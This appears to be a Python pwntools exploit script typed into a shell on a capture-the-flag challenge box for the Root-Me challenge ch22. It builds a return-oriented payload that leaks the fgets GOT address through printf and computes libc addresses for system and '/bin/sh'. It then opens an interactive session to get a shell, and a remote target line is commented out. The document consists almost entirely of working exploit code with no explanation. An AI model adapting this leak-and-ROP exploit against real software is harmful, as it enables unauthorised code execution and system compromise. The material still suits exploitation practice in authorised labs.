app-systeme-ch22@challenge03:~$ python -c 'from pwn import *from time import

1. app-systeme-ch22@challenge03:~$ python -c '
2. from pwn import *
3. from time import sleep
4.  
5. b = ELF("/challenge/app-systeme/ch22/ch22")
6. sled = 48 * "n"
7. addrmain = p32(b.symbols["main"])
8. #addrmain = p32(0x080485a4)
9. #addrmain = p32(0x80485b1)
10.  
11. bss = p32(0x0804a020)
12. size = p32(0x10)
13. stdin = p32(0x0804a024)
14. gadget_pop_ebx = p32(0x08048573)
15. gadget_call_eax = p32(0x0804859f)
16.  
17. fgets = p32(b.symbols["got.fgets"])
18. printf = p32(b.symbols["printf"])
19. context.log_level = 2
20. pay = sled + printf + gadget_pop_ebx +fgets + gadget_pop_ebx + addrmain #+"\naaa"
21.  
22. p = process("/challenge/app-systeme/ch22/ch22")
23. #p = remote("challenge03.root-me.org",56522)
24. #p=gdb.debug("/challenge/app-systeme/ch22/ch22")
25.  
26. context.timeout=100000
27. p.recv(timeout=1)
28.  
29. p.sendline(pay)
30. buf = p.recvline(timeout=1)
31. p.sendline("")
32. buf = p.recvline(timeout=1)
33. log.info(buf)
34.  
35. leak_fgets = u32(buf[0:4])
36. leak_system = leak_fgets - 0x28db0
37. leak_binsh = leak_fgets+0x11811F
38. leak_exit = leak_fgets-0x35be0
39. leak_printf = leak_fgets - 0x14ce0
40.  
41. log.info("Leak got fgets: "+str(hex(leak_fgets)))
42. log.info("Leak calculate system: "+str(hex(leak_system)))
43. log.info("Leak /bin/sh: "+str(hex(leak_binsh)))
44.  
45. #pay = sled + p32(leak_system) + gadget_pop_ebx +p32(leak_binsh) +addrmain
46. p.sendline(pay)
47. buf = p.recvline(timeout=1)
48. p.sendline("")
49. buf = p.recvline(timeout=1)
50. log.info(buf)
51. p.interactive()
52. '